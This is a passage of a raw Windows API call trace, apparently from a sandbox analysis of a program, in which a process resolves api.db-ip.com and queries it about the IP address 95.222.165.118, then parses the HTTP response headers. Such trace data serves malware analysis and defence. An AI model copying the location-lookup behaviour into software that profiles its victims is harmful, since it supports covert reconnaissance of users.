writefds=0x0, exceptfds=0x0, timeout=0x19fa7c*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa94, writefds=0x0, exceptfds=0x0) returned 0 [0102.584] select (in: nfds=0, readfds=0x19fa94, writefds=0x0, exceptfds=0x0, timeout=0x19fa7c*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa94, writefds=0x0, exceptfds=0x0) returned 0 [0102.585] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x2435c68, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0102.585] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x2435c68, cbMultiByte=14, lpWideCharStr=0x249f9cc, cchWideChar=14 | out: lpWideCharStr="95.222.165.118") returned 14 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.585] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] ResetEvent (hEvent=0x3f4) returned 1 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] ResetEvent (hEvent=0x3f4) returned 1 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] SetEvent (hEvent=0x3f0) returned 1 [0102.586] SetEvent (hEvent=0x3f4) returned 1 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] ResetEvent (hEvent=0x3f4) returned 1 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] ResetEvent (hEvent=0x3f4) returned 1 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] SetEvent (hEvent=0x3f0) returned 1 [0102.586] SetEvent (hEvent=0x3f4) returned 1 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] ResetEvent (hEvent=0x3f4) returned 1 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] ResetEvent (hEvent=0x3f4) returned 1 [0102.586] CloseHandle (hObject=0x3f4) returned 1 [0102.586] CloseHandle (hObject=0x3f0) returned 1 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.586] GetCurrentThreadId () returned 0x1358 [0102.587] GetCurrentThreadId () returned 0x1358 [0102.587] GetCurrentThreadId () returned 0x1358 [0102.587] shutdown (s=0x3d0, how=1) returned 0 [0102.587] closesocket (s=0x3d0) returned 0 [0102.587] GetCurrentThreadId () returned 0x1358 [0102.587] GetCurrentThreadId () returned 0x1358 [0102.587] GetCurrentThreadId () returned 0x1358 [0102.587] GetCurrentThreadId () returned 0x1358 [0102.587] GetCurrentThreadId () returned 0x1358 [0102.587] GetCurrentThreadId () returned 0x1358 [0102.587] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0102.588] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0102.588] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] GetCurrentThreadId () returned 0x1358 [0102.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0102.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0102.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/v2/free/95.222.165.118/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PATCH", cchCount2=5) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PATCH", cchCount2=5) returned 1 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0102.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="api.db-ip.com", cchCount2=13) returned 1 [0102.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0102.590] socket (af=2, type=1, protocol=0) returned 0x3d0 [0102.590] getsockopt (in: s=0x3d0, level=65535, optname=4104, optval=0x19fb10, optlen=0x19fb0c | out: optval="\x01", optlen=0x19fb0c) returned 0 [0102.590] getsockopt (in: s=0x3d0, level=6, optname=1, optval=0x19fb10, optlen=0x19fb0c | out: optval="", optlen=0x19fb0c) returned 0 [0102.590] setsockopt (s=0x3d0, level=65535, optname=4, optval="", optlen=4) returned 0 [0102.590] htons (hostshort=0x0) returned 0x0 [0102.590] bind (s=0x3d0, addr=0x19fa68*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0102.590] getsockname (in: s=0x3d0, name=0x19fa5c, namelen=0x19fadc | out: name=0x19fa5c*(sa_family=2, sin_port=0xc21b, sin_addr="0.0.0.0"), namelen=0x19fadc) returned 0 [0102.590] htons (hostshort=0x1bc2) returned 0xc21b [0102.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="api.db-ip.com", cchCount1=13, lpString2="LOCALHOST", cchCount2=9) returned 1 [0102.591] GetAddrInfoW (in: pNodeName="api.db-ip.com", pServiceName=0x0, pHints=0x19fb10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fb30 | out: ppResult=0x19fb30*=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1eb08*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1d8*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) returned 0 [0102.890] FreeAddrInfoW (pAddrInfo=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1eb08*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1d8*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) [0102.890] htons (hostshort=0x50) returned 0x5000 [0102.891] connect (s=0x3d0, name=0x19fac0*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=16) returned 0 [0102.910] getsockname (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0xc21b, sin_addr="192.168.0.147"), namelen=0x19fb28) returned 0 [0102.911] htons (hostshort=0x1bc2) returned 0xc21b [0102.911] getpeername (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=0x19fb28) returned 0 [0102.911] htons (hostshort=0x5000) returned 0x50 [0102.911] GetCurrentThreadId () returned 0x1358 [0102.911] GetCurrentThreadId () returned 0x1358 [0102.911] GetCurrentThreadId () returned 0x1358 [0102.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept", cchCount2=6) returned 3 [0102.911] GetCurrentThreadId () returned 0x1358 [0102.911] GetCurrentThreadId () returned 0x1358 [0102.911] GetCurrentThreadId () returned 0x1358 [0102.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="User-Agent", cchCount2=10) returned 1 [0102.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="User-Agent", cchCount2=10) returned 1 [0102.911] GetCurrentThreadId () returned 0x1358 [0102.911] GetCurrentThreadId () returned 0x1358 [0102.911] GetCurrentThreadId () returned 0x1358 [0102.911] send (s=0x3d0, buf=0x24049b8*, len=200, flags=0) returned 200 [0102.912] GetTickCount64 () returned 0x115b061 [0102.912] select (in: nfds=0, readfds=0x19fa24, writefds=0x0, exceptfds=0x0, timeout=0x0 | out: readfds=0x19fa24, writefds=0x0, exceptfds=0x0) returned 1 [0102.949] recv (in: s=0x3d0, buf=0x2435c68, len=32768, flags=0 | out: buf=0x2435c68*) returned 503 [0102.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0", cchCount1=3, lpString2="1.1", cchCount2=3) returned 1 [0102.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.1", cchCount1=3, lpString2="1.1", cchCount2=3) returned 2 [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] GetTickCount64 () returned 0x115b08f [0102.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0102.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Cache-control", cchCount2=13) returned 3 [0102.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Cache-control", cchCount2=13) returned 3 [0102.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0102.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0102.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0102.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Cache-control", cchCount2=13) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Cache-control", cchCount2=13) returned 2 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Connection", cchCount2=10) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Connection", cchCount2=10) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Connection", cchCount2=10) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Connection", cchCount2=10) returned 2 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Version", cchCount2=15) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Version", cchCount2=15) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Version", cchCount2=15) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Version", cchCount2=15) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Version", cchCount2=15) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Disposition", cchCount2=19) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Disposition", cchCount2=19) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Disposition", cchCount2=19) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 1 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Encoding", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Encoding", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Encoding", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Language", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Language", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Language", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Language", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Language", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 1 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Type", cchCount2=12) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-8", cchCount1=1, lpString2="\"", cchCount2=1) returned 3 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="charset=UTF-8", cchCount1=7, lpString2="charset", cchCount2=7) returned 2 [0102.951] GetCurrentThreadId () returned 0x1358 [0102.951] GetCurrentThreadId () returned 0x1358 [0102.951] GetCurrentThreadId () returned 0x1358 [0102.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", 